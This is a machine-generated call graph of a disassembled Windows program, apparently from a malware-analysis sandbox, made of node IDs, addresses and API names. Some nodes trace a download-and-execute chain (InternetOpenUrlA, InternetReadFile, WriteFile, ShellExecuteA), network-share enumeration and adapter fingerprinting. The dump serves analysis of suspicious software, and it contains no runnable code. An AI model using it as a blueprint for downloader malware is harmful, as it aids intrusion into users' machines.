482866 40210->40199 40211 48286f WideCharToMultiByte 40210->40211 40211->40199 40212 48288b GetLastError 40211->40212 40225 4851e7 58 API calls 3 library calls 40212->40225 40215 4801ad 40214->40215 40216 4801fa 40214->40216 40226 485007 40215->40226 40216->40190 40216->40193 40218 4801b3 40219 4801da 40218->40219 40231 4845dc 58 API calls 6 library calls 40218->40231 40219->40216 40232 48495e 58 API calls 6 library calls 40219->40232 40222->40201 40223->40199 40224->40210 40225->40199 40227 48501f __getptd_noexit 58 API calls 40226->40227 40228 48500d 40227->40228 40230 48501a 40228->40230 40233 487c2e 58 API calls 3 library calls 40228->40233 40230->40218 40231->40219 40232->40216 40235 480c62 _malloc 58 API calls 40234->40235 40236 46e684 40235->40236 40237 480c62 _malloc 58 API calls 40236->40237 40238 46e690 40237->40238 40239 46e6b4 GetAdaptersInfo 40238->40239 40240 46e699 40238->40240 40242 46e6c4 40239->40242 40243 46e6db GetAdaptersInfo 40239->40243 40241 481f2d _wprintf 85 API calls 40240->40241 40246 46e6a3 40241->40246 40247 480bed _free 58 API calls 40242->40247 40244 46e741 40243->40244 40245 46e6ea 40243->40245 40250 480bed _free 58 API calls 40244->40250 40284 4804a6 40245->40284 40249 480bed _free 58 API calls 40246->40249 40251 46e6ca 40247->40251 40253 46e6a9 40249->40253 40254 46e74a 40250->40254 40255 480c62 _malloc 58 API calls 40251->40255 40253->39814 40254->39814 40257 46e6d2 40255->40257 40257->40240 40257->40243 40258 46e737 40259 481f2d _wprintf 85 API calls 40258->40259 40259->40244 40261 4756d0 59 API calls 40260->40261 40262 46e8bb CryptAcquireContextW 40261->40262 40263 46e8d8 40262->40263 40264 46e8e9 CryptCreateHash 40262->40264 40507 490eca RaiseException 40263->40507 40266 46e914 CryptHashData 40264->40266 40267 46e903 40264->40267 40269 46e932 40266->40269 40270 46e943 CryptGetHashParam 40266->40270 40508 490eca RaiseException 40267->40508 40509 490eca RaiseException 40269->40509 40272 46e963 40270->40272 40274 46e974 _memset 40270->40274 40510 490eca RaiseException 40272->40510 40275 46e993 CryptGetHashParam 40274->40275 40276 46e9a8 40275->40276 40283 46e9b9 40275->40283 40511 490eca RaiseException 40276->40511 40278 46ea10 40280 46ea16 CryptDestroyHash CryptReleaseContext 40278->40280 40279 4804a6 _sprintf 83 API calls 40279->40283 40281 46ea33 40280->40281 40281->39819 40282 473ea0 59 API calls 40282->40283 40283->40278 40283->40279 40283->40282 40285 4804c2 40284->40285 40286 4804d7 40284->40286 40287 485208 _fputws 58 API calls 40285->40287 40286->40285 40288 4804de 40286->40288 40289 4804c7 40287->40289 40313 486ab6 40288->40313 40312 4842d2 9 API calls __invalid_parameter_noinfo_noreturn 40289->40312 40292 480504 40294 46e725 40292->40294 40337 4864ef 78 API calls 7 library calls 40292->40337 40295 481f2d 40294->40295 40296 481f39 _fputws 40295->40296 40297 481f4a 40296->40297 40298 481f5f __flswbuf 40296->40298 40299 485208 _fputws 58 API calls 40297->40299 40356 480e92 40298->40356 40300 481f4f 40299->40300 40372 4842d2 9 API calls __invalid_parameter_noinfo_noreturn 40300->40372 40303 481f6f __flswbuf 40361 48afd2 40303->40361 40304 481f5a _fputws 40304->40258 40306 481f82 __flswbuf 40307 486ab6 __output_l 83 API calls 40306->40307 40308 481f9b __flswbuf 40307->40308 40368 48afa1 40308->40368 40312->40294 40314 48019c _LocaleUpdate::_LocaleUpdate 58 API calls 40313->40314 40315 486b2b 40314->40315 40316 485208 _fputws 58 API calls 40315->40316 40317 486b30 40316->40317 40318 487601 40317->40318 40327 486b50 __output_l __aulldvrm _strlen 40317->40327 40345 48816b 40317->40345 40319 485208 _fputws 58 API calls 40318->40319 40320 487606 40319->40320 40353 4842d2 9 API calls __invalid_parameter_noinfo_noreturn 40320->40353 40322 4875db 40338 48a77e 40322->40338 40325 4875fd 40325->40292 40327->40318 40327->40322 40328 48766a 78 API calls __output_l 40327->40328 40329 4871b9 DecodePointer 40327->40329 40330 480bed _free 58 API calls 40327->40330 40331 49adf7 60 API calls __cftof 40327->40331 40332 488cde __malloc_crt 58 API calls 40327->40332 40333 48721c DecodePointer 40327->40333 40334 487241 DecodePointer 40327->40334 40335 4876de 78 API calls _write_string 40327->40335 40336 4876b2 78 API calls _write_multi_char 40327->40336 40352 482bcc 58 API calls _LocaleUpdate::_LocaleUpdate 40327->40352 40328->40327 40329->40327 40330->40327 40331->40327 40332->40327 40333->40327 40334->40327 40335->40327 40336->40327 40337->40294 40339 48a788 IsProcessorFeaturePresent 40338->40339 40340 48a786 40338->40340 40342 48ab9c 40339->40342 40340->40325 40354 48ab4b 5 API calls ___raise_securityfailure 40342->40354 40344 48ac7f 40344->40325 40346 48818a 40345->40346 40347 488175 40345->40347 40346->40327 40348 485208 _fputws 58 API calls 40347->40348 40349 48817a 40348->40349 40355 4842d2 9 API calls __invalid_parameter_noinfo_noreturn 40349->40355 40351 488185 40351->40327 40352->40327 40353->40322 40354->40344 40355->40351 40357 480e9d 40356->40357 40358 480eb3 EnterCriticalSection 40356->40358 40359 488af7 __lock 58 API calls 40357->40359 40358->40303 40360 480ea6 40359->40360 40360->40303 40362 48816b _fprintf 58 API calls 40361->40362 40363 48afdf 40362->40363 40374 4989c2 40363->40374 40365 48b034 40365->40306 40366 48afe5 __flswbuf 40366->40365 40367 488cde __malloc_crt 58 API calls 40366->40367 40367->40365 40369 48afaa 40368->40369 40370 481faf 40368->40370 40369->40370 40384 48836b 40369->40384 40373 481fc9 LeaveCriticalSection LeaveCriticalSection __flswbuf __getstream 40370->40373 40372->40304 40373->40304 40375 4989cd 40374->40375 40377 4989da 40374->40377 40376 485208 _fputws 58 API calls 40375->40376 40378 4989d2 40376->40378 40379 4989e6 40377->40379 40380 485208 _fputws 58 API calls 40377->40380 40378->40366 40379->40366 40381 498a07 40380->40381 40383 4842d2 9 API calls __invalid_parameter_noinfo_noreturn 40381->40383 40383->40378 40385 48837e 40384->40385 40389 4883a2 40384->40389 40386 48816b _fprintf 58 API calls 40385->40386 40385->40389 40387 48839b 40386->40387 40390 48df14 40387->40390 40389->40370 40391 48df20 _fputws 40390->40391 40392 48df2d 40391->40392 40393 48df44 40391->40393 40490 4851d4 58 API calls __getptd_noexit 40392->40490 40394 48dfe3 40393->40394 40397 48df58 40393->40397 40494 4851d4 58 API calls __getptd_noexit 40394->40494 40396 48df32 40399 485208 _fputws 58 API calls 40396->40399 40400 48df80 40397->40400 40401 48df76 40397->40401 40410 48df39 _fputws 40399->40410 40418 49b134 40400->40418 40491 4851d4 58 API calls __getptd_noexit 40401->40491 40402 48df7b 40406 485208 _fputws 58 API calls 40402->40406 40405 48df86 40407 48df99 40405->40407 40408 48dfac 40405->40408 40409 48dfef 40406->40409 40427 48e003 40407->40427 40411 485208 _fputws 58 API calls 40408->40411 40495 4842d2 9 API calls __invalid_parameter_noinfo_noreturn 40409->40495 40410->40389 40414 48dfb1 40411->40414 40492 4851d4 58 API calls __getptd_noexit 40414->40492 40415 48dfa5 40493 48dfdb LeaveCriticalSection __unlock_fhandle 40415->40493 40419 49b140 _fputws 40418->40419 40420 49b18f EnterCriticalSection 40419->40420 40421 488af7 __lock 58 API calls 40419->40421 40422 49b1b5 _fputws 40420->40422 40423 49b165 40421->40423 40422->40405 40426 49b17d 40423->40426 40496 49263e InitializeCriticalSectionAndSpinCount 40423->40496 40497 49b1b9 LeaveCriticalSection _doexit 40426->40497 40428 48e010 __write_nolock 40427->40428 40429 48e06e 40428->40429 40430 48e04f 40428->40430 40475 48e044 40428->40475 40435 48e0c6 40429->40435 40436 48e0aa 40429->40436 40498 4851d4 58 API calls __getptd_noexit 40430->40498 40431 48a77e UnDecorator::getTemplateArgumentList 6 API calls 40433 48e864 40431->40433 40433->40415 40434 48e054 40438 485208 _fputws 58 API calls 40434->40438 40439 48e0df 40435->40439 40502 48f744 60 API calls 3 library calls 40435->40502 40500 4851d4 58 API calls __getptd_noexit 40436->40500 40441 48e05b 40438->40441 40443 4989c2 __read_nolock 58 API calls 40439->40443 40440 48e0af 40444 485208 _fputws 58 API calls 40440->40444 40499 4842d2 9 API calls __invalid_parameter_noinfo_noreturn 40441->40499 40446 48e0ed 40443->40446 40447 48e0b6 40444->40447 40448 48e446 40446->40448 40452 485007 __wsetlocale_set_cat 58 API calls 40446->40452 40501 4842d2 9 API calls __invalid_parameter_noinfo_noreturn 40447->40501 40449 48e7d9 WriteFile 40448->40449 40450 48e464 40448->40450 40453 48e439 GetLastError 40449->40453 40478 48e678 40449->40478 40454 48e588 40450->40454 40455 48e47a 40450->40455 40456 48e119 GetConsoleMode 40452->40456 40467 48e406 40453->40467 40472 48e67d 40454->40472 40473 48e593 40454->40473 40459 48e4e9 WriteFile 40455->40459 40462 48e812 40455->40462 40455->40467 40456->40448 40458 48e158 40456->40458 40457 48e168 GetConsoleCP 40457->40462 40484 48e197 40457->40484 40458->40448 40458->40457 40459->40453 40459->40455 40460 485208 _fputws 58 API calls 40461 48e840 40460->40461 40506 4851d4 58 API calls __getptd_noexit 40461->40506 40462->40460 40462->40475 40463 48e566 40464 48e809 40463->40464 40465 48e571 40463->40465 40505 4851e7 58 API calls 3 library calls 40464->40505 40470 485208 _fputws 58 API calls 40465->40470 40466 48e6f2 WideCharToMultiByte 40466->40453 40483 48e739 40466->40483 40467->40462 40467->40463 40467->40475 40468 48e5f8 WriteFile 40468->40453 40474 48e647 40468->40474 40476 48e576 40470->40476 40472->40462 40472->40466 40473->40462 40473->40468 40474->40467 40474->40473 40474->40478 40475->40431 40504 4851d4 58 API calls __getptd_noexit 40476->40504 40477 48e741 WriteFile 40481 48e794 GetLastError 40477->40481 40477->40483 40478->40467 40481->40483 40482 49c76c 60 API calls __putch_nolock 40482->40484 40483->40467 40483->40472 40483->40477 40483->40478 40484->40467 40484->40482 40485 48e280 WideCharToMultiByte 40484->40485 40488 48e2ed 40484->40488 40503 482d33 58 API calls __isleadbyte_l 40484->40503 40485->40467 40486 48e2bb WriteFile 40485->40486 40486->40453 40486->40488 40487 4a058c WriteConsoleW CreateFileW __putwch_nolock 40487->40488 40488->40453 40488->40467 40488->40484 40488->40487 40489 48e315 WriteFile 40488->40489 40489->40453 40489->40488 40490->40396 40491->40402 40492->40415 40493->40410 40494->40402 40495->40410 40496->40426 40497->40420 40498->40434 40499->40475 40500->40440 40501->40475 40502->40439 40503->40484 40504->40475 40505->40475 40506->40475 40507->40264 40508->40266 40509->40270 40510->40274 40511->40283 40513 473c62 40512->40513 40521 473c74 _memset 40512->40521 40514 473c67 40513->40514 40515 473c96 40513->40515 40516 483b4c 59 API calls 40514->40516 40517 4af23e 59 API calls 40515->40517 40518 473c6d 40516->40518 40517->40518 40518->40521 40529 4af1bb 59 API calls 3 library calls 40518->40529 40521->39824 40523 478513 40522->40523 40528 478520 40522->40528 40523->40528 40530 475810 40523->40530 40525 478619 40525->39826 40526 4af23e 59 API calls 40526->40528 40527 476760 59 API calls 40527->40528 40528->40525 40528->40526 40528->40527 40531 4758b6 40530->40531 40532 475823 40530->40532 40533 4af23e 59 API calls 40531->40533 40534 476760 59 API calls 40532->40534 40536 475841 ___check_float_string 40532->40536 40537 4758c0 40533->40537 40535 475833 40534->40535 40535->40528 40536->40528 40537->40528 40538->39828 40539->39831 40540->39834 40541->39839 40542->39841 40543->39861 40544->39861 40545->39884 40546->39884 40547->39893 40548->39893 40549->39900 40578 481037 40550->40578 40552 46c78a 40552->39913 40553 480546 40552->40553 40554 480550 40553->40554 40555 480564 40553->40555 40556 485208 _fputws 58 API calls 40554->40556 40555->39929 40557 480555 40556->40557 40778 4842d2 9 API calls __invalid_parameter_noinfo_noreturn 40557->40778 40559 480560 40559->39929 40562 48110d _fputws 40560->40562 40561 48111e 40564 485208 _fputws 58 API calls 40561->40564 40562->40561 40563 48114c 40562->40563 40568 48112e _fputws 40563->40568 40779 480e53 40563->40779 40565 481123 40564->40565 40824 4842d2 9 API calls __invalid_parameter_noinfo_noreturn 40565->40824 40568->39929 40569 48117d 40825 4811b5 LeaveCriticalSection LeaveCriticalSection _fprintf 40569->40825 40570 48115b 40570->40569 40785 489312 40570->40785 40573->39913 40574->39912 40575->39918 40576->39923 40577->39927 40581 481043 _fputws 40578->40581 40579 481056 40580 485208 _fputws 58 API calls 40579->40580 40582 48105b 40580->40582 40581->40579 40583 481087 40581->40583 40627 4842d2 9 API calls __invalid_parameter_noinfo_noreturn 40582->40627 40597 488df4 40583->40597 40586 48108c 40587 4810a2 40586->40587 40588 481095 40586->40588 40590 4810cc 40587->40590 40591 4810ac 40587->40591 40589 485208 _fputws 58 API calls 40588->40589 40593 481066 _fputws @_EH4_CallFilterFunc@8 40589->40593 40612 488f13 40590->40612 40594 485208 _fputws 58 API calls 40591->40594 40593->40552 40594->40593 40598 488e00 _fputws 40597->40598 40599 488af7 __lock 58 API calls 40598->40599 40610 488e0e 40599->40610 40600 488e82 40629 488f0a 40600->40629 40601 488e89 40603 488cde __malloc_crt 58 API calls 40601->40603 40605 488e90 40603->40605 40604 488eff _fputws 40604->40586 40605->40600 40633 49263e InitializeCriticalSectionAndSpinCount 40605->40633 40606 480e92 __getstream 59 API calls 40606->40610 40608 488b9f __mtinitlocknum 58 API calls 40608->40610 40609 488eb6 EnterCriticalSection 40609->40600 40610->40600 40610->40601 40610->40606 40610->40608 40632 480efc LeaveCriticalSection LeaveCriticalSection _doexit 40610->40632 40613 488f33 __wopenfile 40612->40613 40614 488f4d 40613->40614 40626 489108 40613->40626 40639 49c232 60 API calls 2 library calls 40613->40639 40615 485208 _fputws 58 API calls 40614->40615 40616 488f52 40615->40616 40638 4842d2 9 API calls __invalid_parameter_noinfo_noreturn 40616->40638 40618 48916b 40635 49c214 40618->40635 40619 4810d7 40628 4810f9 LeaveCriticalSection LeaveCriticalSection _fprintf 40619->40628 40622 489101 40622->40626 40640 49c232 60 API calls 2 library calls 40622->40640 40624 489120 40624->40626 40641 49c232 60 API calls 2 library calls 40624->40641 40626->40614 40626->40618 40627->40593 40628->40593 40634 488c81 LeaveCriticalSection 40629->40634 40631 488f11 40631->40604 40632->40610 40633->40609 40634->40631 40642 49b9f8 40635->40642 40637 49c22d 40637->40619 40638->40619 40639->40622 40640->40624 40641->40626 40644 49ba04 _fputws 40642->40644 40643 49ba1a 40645 485208 _fputws 58 API calls 40643->40645 40644->40643 40646 49ba50 40644->40646 40647 49ba1f 40645->40647 40653 49bac1 40646->40653 40725 4842d2 9 API calls __invalid_parameter_noinfo_noreturn 40647->40725 40652 49ba29 _fputws 40652->40637 40654 49bae1 40653->40654 40727 4a7f50 40654->40727 40656 49bc34 40773 4842fd 8 API calls 2 library calls 40656->40773 40658 49c213 40659 49bafd 40659->40656 40660 49bb37 40659->40660 40665 49bb5a 40659->40665 40758 4851d4 58 API calls __getptd_noexit 40660->40758 40662 49bb3c 40663 485208 _fputws 58 API calls 40662->40663 40664 49bb49 40663->40664 40759 4842d2 9 API calls __invalid_parameter_noinfo_noreturn 40664->40759 40666 49bc18 40665->40666 40674 49bbf6 40665->40674 40760 4851d4 58 API calls __getptd_noexit 40666->40760 40669 49ba6c 40726 49ba95 LeaveCriticalSection __unlock_fhandle 40669->40726 40670 49bc1d 40671 485208 _fputws 58 API calls 40670->40671 40672 49bc2a 40671->40672 40761 4842d2 9 API calls __invalid_parameter_noinfo_noreturn 40672->40761 40734 49b1c2 40674->40734 40676 49bcc4 40677 49bcce 40676->40677 40678 49bcf1 40676->40678 40762 4851d4 58 API calls __getptd_noexit 40677->40762 40752 49b88d 40678->40752 40681 49bcd3 40725->40652 40726->40652 40728 4a7f5a 40727->40728 40729 4a7f6f 40727->40729 40730 485208 _fputws 58 API calls 40728->40730 40729->40659 40731 4a7f5f 40730->40731 40774 4842d2 9 API calls __invalid_parameter_noinfo_noreturn 40731->40774 40733 4a7f6a 40733->40659 40735 49b1ce _fputws 40734->40735 40736 488b9f __mtinitlocknum 58 API calls 40735->40736 40737 49b1df 40736->40737 40738 488af7 __lock 58 API calls 40737->40738 40739 49b1e4 _fputws 40737->40739 40748 49b1f2 40738->40748 40739->40676 40740 49b340 40777 49b362 LeaveCriticalSection _doexit 40740->40777 40741 49b2d2 40743 488c96 __calloc_crt 58 API calls 40741->40743 40746 49b2db 40743->40746 40744 488af7 __lock 58 API calls 40744->40748 40745 49b272 EnterCriticalSection 40747 49b282 LeaveCriticalSection 40745->40747 40745->40748 40746->40740 40747->40748 40748->40740 40748->40741 40748->40744 40748->40745 40775 49263e InitializeCriticalSectionAndSpinCount 40748->40775 40776 49b29a LeaveCriticalSection _doexit 40748->40776 40753 49b898 ___crtIsPackagedApp 40752->40753 40758->40662 40759->40669 40760->40670 40761->40656 40762->40681 40773->40658 40774->40733 40775->40748 40776->40748 40777->40739 40778->40559 40780 480e63 40779->40780 40781 480e85 EnterCriticalSection 40779->40781 40780->40781 40782 480e6b 40780->40782 40783 480e7b 40781->40783 40784 488af7 __lock 58 API calls 40782->40784 40783->40570 40784->40783 40786 48932b 40785->40786 40787 4894a3 40785->40787 40788 48816b _fprintf 58 API calls 40786->40788 40823 48938a 40787->40823 40849 49c784 72 API calls 4 library calls 40787->40849 40789 489331 40788->40789 40791 489354 40789->40791 40792 48816b _fprintf 58 API calls 40789->40792 40794 48936d 40791->40794 40795 4893c0 40791->40795 40793 48933d 40792->40793 40793->40791 40796 48816b _fprintf 58 API calls 40793->40796 40798 48b2f2 __filbuf 72 API calls 40794->40798 40801 489372 40794->40801 40795->40787 40797 48816b _fprintf 58 API calls 40795->40797 40799 489349 40796->40799 40800 4893d0 40797->40800 40798->40801 40802 48816b _fprintf 58 API calls 40799->40802 40803 4893f3 40800->40803 40804 48816b _fprintf 58 API calls 40800->40804 40805 48b2f2 __filbuf 72 API calls 40801->40805 40801->40823 40802->40791 40803->40787 40806 48940e 40803->40806 40807 4893dc 40804->40807 40805->40823 40808 489416 40806->40808 40826 48b2f2 40806->40826 40807->40803 40810 48816b _fprintf 58 API calls 40807->40810 40808->40823 40846 482d33 58 API calls __isleadbyte_l 40808->40846 40811 4893e8 40810->40811 40814 48816b _fprintf 58 API calls 40811->40814 40813 48943e 40815 489473 40813->40815 40816 489448 40813->40816 40818 48b2f2 __filbuf 72 API calls 40813->40818 40814->40803 40848 49c76c 60 API calls __input_l 40815->40848 40816->40815 40820 489460 40816->40820 40818->40816 40819 489487 40822 485208 _fputws 58 API calls 40819->40822 40819->40823 40847 49c607 60 API calls 4 library calls 40820->40847 40822->40823 40823->40570 40824->40568 40825->40568 40827 48b2fd 40826->40827 40831 48b312 40826->40831 40828 485208 _fputws 58 API calls 40827->40828 40829 48b302 40828->40829 40883 4842d2 9 API calls __invalid_parameter_noinfo_noreturn 40829->40883 40832 48b347 40831->40832 40838 48b30d 40831->40838 40884 498a16 58 API calls __malloc_crt 40831->40884 40834 48816b _fprintf 58 API calls 40832->40834 40835 48b35b 40834->40835 40850 48b4b0 40835->40850 40838->40808 40846->40813 40847->40823 40848->40819 40849->40823 40851 48b4bc _fputws 40850->40851 40852 48b4c9 40851->40852 40853 48b4e0 40851->40853 40953 4851d4 58 API calls __getptd_noexit 40852->40953 40855 48b5a4 40853->40855 40858 48b4f4 40853->40858 40958 4851d4 58 API calls __getptd_noexit 40855->40958 40857 48b4ce 40860 485208 _fputws 58 API calls 40857->40860 40861 48b51f 40858->40861 40862 48b512 40858->40862 40859 48b517 40864 48b52c 40861->40864 40865 48b541 40861->40865 40954 4851d4 58 API calls __getptd_noexit 40862->40954 40883->40838 40884->40832 40953->40857 40954->40859 40958->40859 40973 475ab8 40972->40973 40974 4759e8 40972->40974 41051 4af26c 59 API calls 3 library calls 40973->41051 40976 475ac2 40974->40976 40977 475a02 40974->40977 40978 4af23e 59 API calls 40976->40978 40979 475acc 40977->40979 40980 475a1a 40977->40980 40986 475a2a ___check_float_string 40977->40986 40978->40979 40981 4af23e 59 API calls 40979->40981 40982 476950 59 API calls 40980->40982 40980->40986 40990 475ad6 40981->40990 40982->40986 40983 475b36 40984 475bf1 40983->40984 40985 475b49 40983->40985 40987 4af23e 59 API calls 40984->40987 40988 475b61 40985->40988 40989 475bfb 40985->40989 40995 475b71 ___check_float_string 40985->40995 40986->39943 40987->40989 40992 476950 59 API calls 40988->40992 40988->40995 40991 4af23e 59 API calls 40989->40991 40990->40983 40994 475b15 40990->40994 40993 475c05 40991->40993 40992->40995 40996 4759d0 59 API calls 40994->40996 40995->39943 40997 475b30 40996->40997 40997->39943 41051->40976 41182 483f74 41139->41182 41142 47f196 Sleep 41143 47f1c1 41142->41143 41144 47f94b 41142->41144 41145 470a50 65 API calls 41143->41145 41146 474690 59 API calls 41144->41146 41157 47f1cd 41145->41157 41147 47f97a 41146->41147 41242 470160 89 API calls 5 library calls 41147->41242 41148 47f216 41150 475c10 59 API calls 41148->41150 41151 47f274 41150->41151 41152 47f9c1 SendMessageW 41155 47f9e1 41152->41155 41177 47f8af 41152->41177 41154 480235 _LangCountryEnumProc@4 60 API calls 41154->41157 41155->41177 41156 4711c0 170 API calls 41158 47f987 41156->41158 41157->41148 41157->41154 41158->41152 41158->41156 41159 471ab0 PeekMessageW DispatchMessageW PeekMessageW 41158->41159 41159->41158 41183 485007 __wsetlocale_set_cat 58 API calls 41182->41183 41184 47f16a Sleep 41183->41184 41184->41142 41184->41177 41242->41158 41347 470bd0 WNetOpenEnumW 41344->41347 41346 47fd95 SendMessageW 41348 470c33 GlobalAlloc 41347->41348 41349 470c1c 41347->41349 41350 470c45 _memset 41348->41350 41349->41346 41351 470c51 WNetEnumResourceW 41350->41351 41353 475c10 59 API calls 41350->41353 41354 4750c0 59 API calls 41350->41354 41355 478fd0 59 API calls 41350->41355 41356 470bd0 59 API calls 41350->41356 41351->41350 41352 470ea3 WNetCloseEnum 41351->41352 41352->41346 41353->41350 41354->41350 41355->41350 41356->41350 41358 47dbf6 __write_nolock 41357->41358 41359 473ff0 59 API calls 41358->41359 41360 47dc31 41359->41360 41361 4756d0 59 API calls 41360->41361 41362 47dc82 41361->41362 41363 473ff0 59 API calls 41362->41363 41364 47dcb1 41363->41364 41365 46ecb0 60 API calls 41364->41365 41366 47dcc5 41365->41366 41367 47dcf0 LoadLibraryW GetProcAddress 41366->41367 41370 47e459 41366->41370 41368 473c40 59 API calls 41367->41368 41369 47dd1a UuidCreate UuidToStringA 41368->41369 41372 47dd84 41369->41372 41372->41372 41373 4756d0 59 API calls 41372->41373 41374 47dda7 RpcStringFreeA PathAppendA CreateDirectoryA 41373->41374 41375 4784e0 59 API calls 41374->41375 41376 47de18 41375->41376 41377 473ff0 59 API calls 41376->41377 41378 47de4c 41377->41378 41379 472900 60 API calls 41378->41379 41380 47de5c 41379->41380 41381 473580 59 API calls 41380->41381 41385 47de73 _memset _memmove _wcsstr 41381->41385 41382 47e3d3 41382->41370 41383 47deec InternetOpenA 41384 473ff0 59 API calls 41383->41384 41384->41385 41385->41382 41385->41383 41386 472900 60 API calls 41385->41386 41387 474690 59 API calls 41385->41387 41388 472840 60 API calls 41385->41388 41390 47e079 InternetOpenUrlA 41385->41390 41391 47e0e2 HttpQueryInfoW 41385->41391 41392 473ff0 59 API calls 41385->41392 41394 47e1ec lstrcpyA PathAppendA 41385->41394 41395 4756d0 59 API calls 41385->41395 41398 47e2b1 InternetReadFile 41385->41398 41399 47e2dc WriteFile 41385->41399 41400 47e316 CloseHandle InternetCloseHandle InternetCloseHandle 41385->41400 41401 47e334 ShellExecuteA 41385->41401 41471 46dd40 73 API calls 4 library calls 41385->41471 41472 473010 59 API calls 41385->41472 41386->41385 41387->41385 41388->41385 41390->41385 41391->41385 41392->41385 41394->41385 41396 47e267 CreateFileA 41395->41396 41396->41385 41397 47e299 SetFilePointer 41396->41397 41397->41385 41398->41385 41399->41385 41399->41400 41400->41385 41401->41385 41403 48f7c0 __write_nolock 41402->41403 41404 47e6b6 timeGetTime 41403->41404 41405 483f74 58 API calls 41404->41405 41406 47e6cc 41405->41406 41473 46c6a0 RegOpenKeyExW 41406->41473 41409 47e72e InternetOpenW 41457 47e6d4 _memset _strstr _wcsstr 41409->41457 41410 475ae0 59 API calls 41410->41457 41411 47ea8d lstrlenA lstrcpyA lstrcpyA lstrlenA 41411->41457 41412 47ea4c SHGetFolderPathA 41414 47ea67 PathAppendA DeleteFileA 41412->41414 41412->41457 41414->41457 41415 47eada lstrlenA 41415->41457 41416 474690 59 API calls 41440 47e7be _memmove 41416->41440 41417 47ee4d 41419 46ef50 58 API calls 41417->41419 41418 4756d0 59 API calls 41418->41457 41424 47ee5d 41419->41424 41420 472900 60 API calls 41420->41457 41422 473ff0 59 API calls 41422->41457 41423 47eb53 lstrcpyW 41425 47eb74 lstrlenA 41423->41425 41423->41457 41427 473ea0 59 API calls 41424->41427 41430 47eeb1 41424->41430 41428 480c62 _malloc 58 API calls 41425->41428 41426 4759d0 59 API calls 41426->41457 41427->41424 41428->41457 41429 47e8f3 lstrcpyW 41431 47e943 InternetOpenUrlW InternetReadFile 41429->41431 41429->41457 41432 46ef50 58 API calls 41430->41432 41434 47e9ec InternetCloseHandle InternetCloseHandle 41431->41434 41435 47e97c SHGetFolderPathA 41431->41435 41441 47eec1 41432->41441 41433 47eb99 MultiByteToWideChar lstrcpyW 41433->41457 41434->41440 41435->41434 41436 47e996 PathAppendA 41435->41436 41505 4820b6 41436->41505 41438 47e93c lstrcatW 41438->41431 41439 47ec3d lstrlenW lstrlenA lstrcpyA lstrcpyA lstrlenA 41439->41457 41440->41416 41440->41434 41440->41438 41445 47e9c4 lstrlenA 41440->41445 41440->41457 41504 46dd40 73 API calls 4 library calls 41440->41504 41509 483a38 83 API calls 4 library calls 41440->41509 41443 473ea0 59 API calls 41441->41443 41448 47ef12 41441->41448 41442 47ebf0 SHGetFolderPathA 41444 47ec17 PathAppendA DeleteFileA 41442->41444 41442->41457 41443->41441 41444->41457 41508 482b02 80 API calls 2 library calls 41445->41508 41447 47ecaa lstrlenA 41447->41457 41449 473ff0 59 API calls 41448->41449 41451 47ef3a 41449->41451 41452 472900 60 API calls 41451->41452 41454 47ef45 lstrcpyW 41452->41454 41453 47ed1f lstrcpyW 41455 47ed43 lstrlenA 41453->41455 41453->41457 41459 47ef6a 41454->41459 41458 480c62 _malloc 58 API calls 41455->41458 41457->41409 41457->41410 41457->41411 41457->41412 41457->41415 41457->41417 41457->41418 41457->41420 41457->41422 41457->41423 41457->41425 41457->41426 41457->41429 41457->41431 41457->41433 41457->41439 41457->41440 41457->41442 41457->41447 41457->41453 41457->41455 41462 47ed68 MultiByteToWideChar lstrcpyW lstrlenW 41457->41462 41467 47edc3 SHGetFolderPathA 41457->41467 41469 480bed 58 API calls _free 41457->41469 41478 46c500 SHGetFolderPathA 41457->41478 41498 471b10 timeGetTime timeGetTime 41457->41498 41458->41457 41460 473ff0 59 API calls 41459->41460 41461 47ef9f 41460->41461 41463 472900 60 API calls 41461->41463 41462->41457 41465 47edad lstrlenW 41462->41465 41464 47efac lstrcpyW 41463->41464 41470 47ee44 41464->41470 41465->41457 41465->41470 41467->41457 41468 47edea PathAppendA DeleteFileA 41467->41468 41468->41457 41469->41457 41471->41385 41472->41385 41474 46c734 41473->41474 41475 46c6cc RegQueryValueExW 41473->41475 41474->41457 41476 46c70c RegSetValueExW RegCloseKey 41475->41476 41477 46c6fd RegCloseKey 41475->41477 41476->41474 41477->41457 41479 46c525 41478->41479 41480 46c52c PathAppendA 41478->41480 41479->41457 41481 4820b6 125 API calls 41480->41481 41482 46c550 41481->41482 41483 46c559 41482->41483 41510 48387f 85 API calls 4 library calls 41482->41510 41483->41457 41485 46c56c 41511 483455 69 API calls 3 library calls 41485->41511 41487 46c572 41512 480cf4 84 API calls 5 library calls 41487->41512 41489 46c57a 41490 46c5a5 41489->41490 41492 46c589 41489->41492 41515 483a38 83 API calls 4 library calls 41490->41515 41513 4822f5 74 API calls __fread_nolock 41492->41513 41494 46c5ab 41494->41457 41495 46c593 41514 483a38 83 API calls 4 library calls 41495->41514 41497 46c599 41497->41457 41499 471b7f 41498->41499 41500 471b2f 41498->41500 41499->41457 41500->41499 41501 471b40 PeekMessageW 41500->41501 41503 471b58 DispatchMessageW PeekMessageW 41500->41503 41501->41500 41502 471b70 Sleep timeGetTime 41501->41502 41502->41499 41502->41501 41503->41500 41503->41502 41504->41440 41516 481ff2 41505->41516 41507 4820c6 41507->41440 41508->41440 41509->41440 41510->41485 41511->41487 41512->41489 41513->41495 41514->41497 41515->41494 41519 481ffe _fputws 41516->41519 41517 482010 41518 485208 _fputws 58 API calls 41517->41518 41520 482015 41518->41520 41519->41517 41521 48203d 41519->41521 41535 4842d2 9 API calls __invalid_parameter_noinfo_noreturn 41520->41535 41523 488df4 __getstream 61 API calls 41521->41523 41524 482042 41523->41524 41525 482058 41524->41525 41526 48204b 41524->41526 41527 482081 41525->41527 41528 482061 41525->41528 41529 485208 _fputws 58 API calls 41526->41529 41536 48b078 41527->41536 41530 485208 _fputws 58 API calls 41528->41530 41532 482020 _fputws @_EH4_CallFilterFunc@8 41529->41532 41530->41532 41532->41507 41535->41532 41544 48b095 41536->41544 41537 48b0a9 41538 485208 _fputws 58 API calls 41537->41538 41539 48b0ae 41538->41539 41554 4842d2 9 API calls __invalid_parameter_noinfo_noreturn 41539->41554 41540 48b2ac 41559 49fba6 41540->41559 41543 48208c 41553 4820ae LeaveCriticalSection LeaveCriticalSection _fprintf 41543->41553 41544->41537 41552 48b250 41544->41552 41555 49fbc4 58 API calls __mbsnbcmp_l 41544->41555 41546 48b216 41546->41537 41556 49fcf3 65 API calls __mbsnbicmp_l 41546->41556 41548 48b249 41548->41552 41557 49fcf3 65 API calls __mbsnbicmp_l 41548->41557 41550 48b268 41550->41552 41558 49fcf3 65 API calls __mbsnbicmp_l 